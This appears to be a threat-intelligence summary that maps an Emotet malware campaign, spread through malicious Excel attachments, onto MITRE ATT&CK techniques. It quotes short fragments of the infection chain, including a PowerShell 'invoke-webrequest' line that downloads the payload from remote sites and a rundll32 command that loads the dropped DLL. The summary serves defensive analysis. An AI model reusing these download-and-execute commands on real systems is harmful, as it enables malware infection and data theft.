MS Office Files Involved Again in Recent Emotet Trojan Campaign – Part I | FortiGuard Labs 

MITRE Techniques

• [T1566.001] Phishing – Social engineering via email to lure recipients into opening attached Excel files or clicking links. ‘Emotet uses social engineering, like email, to lure recipients into opening attached document files (including Word, Excel, PDF, etc.) or clicking links within the content of the email that download Emotet’s latest variant onto the victim’s device.’
• [T1059.005] VBScript – The VBScript file (tjspowj.vbs) is invoked and used in the macro flow. ‘The malicious Macro has a function called “Workbook_Open()” that is executed automatically in the background when the Excel file opens. It calls other local functions to write data to two files… The Macro executes the “tjspowj.vbs” file with “wscript.exe.”’
• [T1059.001] PowerShell – Encoded PowerShell payload downloaded by the batch and executed; ‘to better understand its intention, I have decoded it below’ and ‘invoke-webrequest -uri $yIdsRhye34syufgxjcdf -outfile $GweYH57sedswd;’
• [T1105] Ingress Tool Transfer – The PowerShell code downloads the Emotet payload from multiple URLs until a download succeeds. ‘It downloads Emotet (into a local file, “c:programdatapuihoud.dll”, that is hardcoded in the PowerShell) from a group of websites until any download is successfully completed.’
• [T1218.011] Signed Binary Proxy Execution: Rundll32 – Emotet runs via rundll32 to load and execute a DLL. ‘rundll32.exe … c:programdatapuihoud.dll,tjpleowdsyf’ and GetProcAddress usage to locate DllRegisterServer.
• [T1082] System Information Discovery – Emotet collects system data using APIs such as GetComputerName(), GetWindowsDirectoryW(), and GetVolumeInformationW().
• [T1041] Exfiltration Over C2 Channel – Data is encrypted and sent to C2 using base64 in an HTTP GET cookies parameter. ‘The base64 string is submitted to the C2 server as a “Cookies” value in an HTTP Get request.’
• [T1547.001] Registry Run Keys / Startup Folder – Persistence by relocating the Emotet DLL and adding an auto-run entry in the system registry. ‘Added auto-run item in the system registry.’
• [T1027] Obfuscated/Encrypted Files and Information – Strings and numbers are encrypted and decrypted just before use to hinder analysis. ‘Strings are Encrypted’ and ‘Constant Numbers are Obfuscated.’
• [T1562.001] Impair Defenses – Anti-analysis techniques including obfuscated code flow and hidden APIs. ‘Anti-Analysis Techniques’ and ‘All APIs are hidden.’